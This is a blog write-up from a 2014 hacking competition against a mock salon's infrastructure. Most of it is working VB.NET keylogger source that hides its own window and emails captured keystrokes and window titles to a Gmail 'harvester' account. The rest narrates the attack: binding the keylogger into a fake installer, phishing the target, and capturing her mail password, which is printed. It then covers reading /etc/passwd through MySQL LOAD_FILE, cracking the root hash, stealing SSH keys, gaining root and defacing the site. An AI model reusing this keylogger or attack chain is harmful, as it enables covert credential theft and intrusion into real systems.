        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Menu)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[alt]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Pause)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[pause]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Escape)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[esc]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Space)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & " "
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.End)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[end]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Home)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[home]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Left)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[left]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Right)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[right]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Up)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[up]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Down)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[down]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Insert)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[insert]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Delete)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[Delete]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (&HBAS)
        If Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & ";"
        End If

        If Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & ":"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (&HBBS)
        If Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "="
        End If

        If Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "+"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (&HBCS)
        If Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & ","
        End If

        If Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "<"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (&HBDS)
        If Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "-"
        End If

        If Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "_"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (&HBES)
        If Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "."
        End If

        If Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & ">"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (&HBFS)
        If Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "/"
        End If

        If Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "?"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (&HC0S)
        If Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "`"
        End If

        If Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "~"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (&HDBS)
        If Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "["
        End If

        If Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "["
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (&HDCS)
        If Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "\"
        End If

        If Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "|"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (&HDDS)
        If Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "]"
        End If

        If Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (&HDES)
        If Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "'"
        End If

        If Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & Chr(34)
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Multiply)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "*"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Divide)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "/"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Add)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "+"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Subtract)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "-"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Decimal)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[Del]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.F1)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[F1]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.F2)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[F2]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.F3)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[F3]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.F4)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[F4]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.F5)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[F5]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.F6)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[F6]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.F7)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[F7]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.F8)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[F8]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.F9)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[F9]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.F10)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[F10]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.F11)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[F11]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.F12)
        If Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[F12]"
        End If

        If Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            Me.Visible = True
            Call RegisterServiceProcess(0, 0)
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.NumLock)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[NumLock]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Scroll)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[ScrollLock]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Print)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[PrintScreen]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.PageUp)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[PageUp]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.PageDown)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[Pagedown]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.NumPad1)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "1"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.NumPad2)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "2"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.NumPad3)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "3"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.NumPad4)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "4"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.NumPad5)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "5"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.NumPad6)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "6"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.NumPad7)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "7"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.NumPad8)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "8"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.NumPad9)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "9"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.NumPad0)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "0"
        End If
        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.ControlKey)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[Ctrl]"
        End If
‘this ends checking our keys for now
‘next trap active window so that we can record and associate do It in one of your timers preferably with a short time frame.
Private Function GetActiveWindowTitle() As String
        Dim kiAppCurrent As String
        kiAppCurrent = New String(Chr(0), 100)
        GetWindowText(GetForegroundWindow, kiAppCurrent, 100)
        kiAppCurrent = kiAppCurrent.Substring(0, InStr(kiAppCurrent, Chr(0)) - 1)
        Return kiAppCurrent
    End Function
‘in timer 2 we add what we trap to the window we trapped it from
Dim strin As String = Nothing
        If strin <> GetActiveWindowTitle() Then
            txtNishikieKeys.Text = txtNishikieKeys.Text + vbNewLine & GetActiveWindowTitle() & vbNewLine
            strin = GetActiveWindowTitle()
        End If

Dim MyMailMessage As New MailMessage()
        MyMailMessage.From = New MailAddress("theharvesteruon@gmail.com")
        MyMailMessage.To.Add("theharvesteruon@gmail.com")
        MyMailMessage.Subject = "Team 0wnErz "
        MyMailMessage.Body = txtNishikieKeys.Text
        Dim SMPT As New SmtpClient("smtp.gmail.com")
        SMPT.Port = 587
        SMPT.EnableSsl = True
        SMPT.Credentials = New System.Net.NetworkCredential("theharvesteruon@gmail.com", "")
        SMPT.Send(MyMailMessage)
        txtNishikieKeys.Text = ""
‘before we forget hide the app lol
Me.hide
Me.opacity = 0
Me.ShowInTaskbar = false

For those asking why no keyboard hooks and all the initialization well its XP no need for paranoia and noise on a system but here’s something to calm you down if you don’t like the tiresome but innocent method above.
Private KeyboardHookProcedure As Win32.HookProc
  Public Sub InstallHooks()
             If hKeyboardHook = 0 Then ' install Keyboard hook
            KeyboardHookProcedure = New Win32.HookProc(AddressOf KeyboardHookProc)
            hKeyboardHook = Win32.SetWindowsHookEx( _
                Win32.WH.WH_KEYBOARD_LL, _
                KeyboardHookProcedure, _
                Marshal.GetHINSTANCE(Reflection.Assembly.GetExecutingAssembly().GetModules( )(0)), _
                0)

            If (hKeyboardHook = 0) Then 'SetWindowsHookEx failed
                RemoveHooks()
                Throw New Exception("SetWindowsHookEx failed.")
            End If
        End If
    End Sub

    Public Sub RemoveHooks()
        Dim keyboardResult As Boolean = True

        If hKeyboardHook <> 0 Then
            keyboardResult = Win32.UnhookWindowsHookEx(hKeyboardHook)
            hKeyboardHook = 0
        End If
        If Not keyboardResult Then 'UnhookWindowsHookEx failed
            Throw New Exception("UnhookWindowsHookEx failed.")
        End If
    End Sub

Also on the Hackbattle group they mentioned that VPS was by Azanuru , and we checked them out as we did the keylogger. We need as much as we can get as we plan to own Joan.
So we visit Azanuru site and guess what open test day till 20th. It was running on Openstack had  3 public IP subnets up and running one on the same network as the VPS running Nasty salon interesting from phpinfo we saw an ubuntu install so we did a 13.10 as is the case on the blog’s tutorial and we join the subnet with the VPS and get a floating IP of:

197.232.19.197
Azanuru guys notice and send us a mail to join the .20 subnet one and kick our floating IP out but one thing we know is we are using a keypair to login and it has sudo access amazing . 

So this (keypair) is what we will be targeting from Joan not other credentials.
So kick us out but we know btw just a feel of how the droplet started failing:
2014-03-10 15:16:42,647 - url_helper.py[WARNING]: Calling
2014-03-10 15:17:39,795 - url_helper.py[WARNING]: Calling 
'http://169.254.169.254/2009-04-04/meta-data/instance-id' failed [112/120s]: request error [HTTPConnectionPool(host='169.254.169.254', port=80): Max retries exceeded with url: /2009-04-04/meta-data/instance-id (Caused by : [Errno 101] Network is unreachable)]
2014-03-10 15:17:46,809 - url_helper.py[WARNING]: Calling 'http://169.254.169.254/2009-04-04/meta-data/instance-id' failed [119/120s]: request error [HTTPConnectionPool(host='169.254.169.254', port=80): Max retries exceeded with url: /2009-04-04/meta-data/instance-id (Caused by : [Errno 101] Network is unreachable)]
2014-03-10 15:17:53,822 - DataSourceEc2.py[CRITICAL]: Giving up on md from ['http://169.254.169.254/2009-04-04/meta-data/instance-id'] after 126 seconds
2014-03-10 15:17:53,826 - util.py[WARNING]: Getting data from failed
Cloud-init v. 0.7.3 running 'modules:config' at Mon, 10 Mar 2014 15:17:54 +0000. Up 262.78 seconds.
 * Starting AppArmor profiles       [80G Skipping profile in /etc/apparmor.d/disable: usr.sbin.rsyslogd

So we finish our keylogger in 2 versions and use easy binder to bind them to simfatic forms , 2 versions btw and we upload them to our spa site and send the mail to Joan:
immediately she installed it logs started coming in to our harvester and we got good things:

http://spa.oo3.co/soft/Simfatic-setup-4.exe 
http://spa.oo3.co/soft/simfatic-setup-2.exe 
 
The Version of the software we bound was meant to give an error message to give leeway incase of a problem to talk to her and send a second keylogger using a different method of logging in order to make it successful incase the first fails.

But the keylogger never failed us so here we are: Confirmed XP was right.

So we got this password as she typed her Gmail password :
Tuesday, March 18, 2014 [12:23 PM] thunderbird.exe: Mail Server Password Required
n@stys4l0nw3b
Time to login to the Gmail and see how much we can get I think the pictures will speak for us here:
So phpMyAdmin Points to a db on .195.

SSH keypair to login to the server

Database Credentials



Successful Login

In here we found passwords to both emails in the emails database but we were checking stuff out still before just using our keypair. So we created a database 0wnErz:
We made a table redteam with 2 columns id and data. We filled them with dummy data then on update we pulled files.
UPDATE redteam SET Data=LOAD_FILE('/etc/hosts)
WHERE id=3;
UPDATE redteam SET Data=LOAD_FILE('/etc/passwd)
WHERE id=4;

For lulz while at it we cracked the mysql root hash , Despite the firewall this was a weak password policy on their end:

root@localhost:  7561F5295A1A35CB8E0A7C46921994D383947FA5 MySQL4.1+: sha1(sha1_bin())    r00t
The race to the finish line began here  . This happened very fast 

So our downloaded keypair from the mail we logged in to the db server.

Then we became super user:

Then we read the history file and more secrets :
cat .bash_history

So there’s another keypair but to the .2 server i.e. webserver, remember from phpinfo? SSH is on port 49800, on checking files in the ubuntu home directory the key and yes it’s just that into the webserver.

Again get Root

Well we’d say we are done but we needed to share our joy so on to /var/www and like any movie give credits to the actors :D


We’d like to thank Gichuki Jonia (./chuks) for the challenge we learnt a lot while doing it and Azanuru for the infrastructure . Made all this possible  .

Friday, March 14, 2014

HACKBATTLE2013 SECOND UPDATE

One group so far has found an application they can target by using two different types of Assessments.

Currently no group has been able to interact with NastyLab DB, or any form of Internal login, system or application level.

Several testers scanning their way to blacklist.

LEAK:, types of Assessments to use

a) Covert Data Acquisition
Try steal data from all directions of the infrastructure, use Threat Intelligence and manipulate data gathered against the applications or systems

b) Advanced Persistence Threat
Polymorphic and SSLed malware use is necessary in case you wonna learn the internals of NastySalon laptops or workstations. Crafting a good methodology will help you add points in this battle.

c) Database Security Assessment

Breaking into the database, going through the information and manipulating the DB, may get you to the next stage of exploitation and access.

d) Web Application Assessment

Understanding the web and its internals is vital. Collecting as much info on the website will help you get a lead on other forms of Assessments above. Being in a position to find a publicly available CMS, will also get you more intel to gain access to NastyLab infrastructure

e) Social Engineering Assessment

Plan and execute a good social engineering attack that is believable in real world. Don't just ask for a password, that will be stupid, understand the infrastructure first and then execute.

Good luck to all teams,

Two weeks to go.

Monday, March 03, 2014

HACKBATTLE 2013

Welcome to #Hackbattle2013, we delayed this battle so that we can have it running after AfricaHackOn this year.

This is the layout, NASTY SALON version 2, its a little diverse and tougher coz you will be dealing with a crazy crazy IDS and FW.

Anyway, lets who goes up the hill.



Infrastructure courtesy of Azanuru, for more information check azanuru.com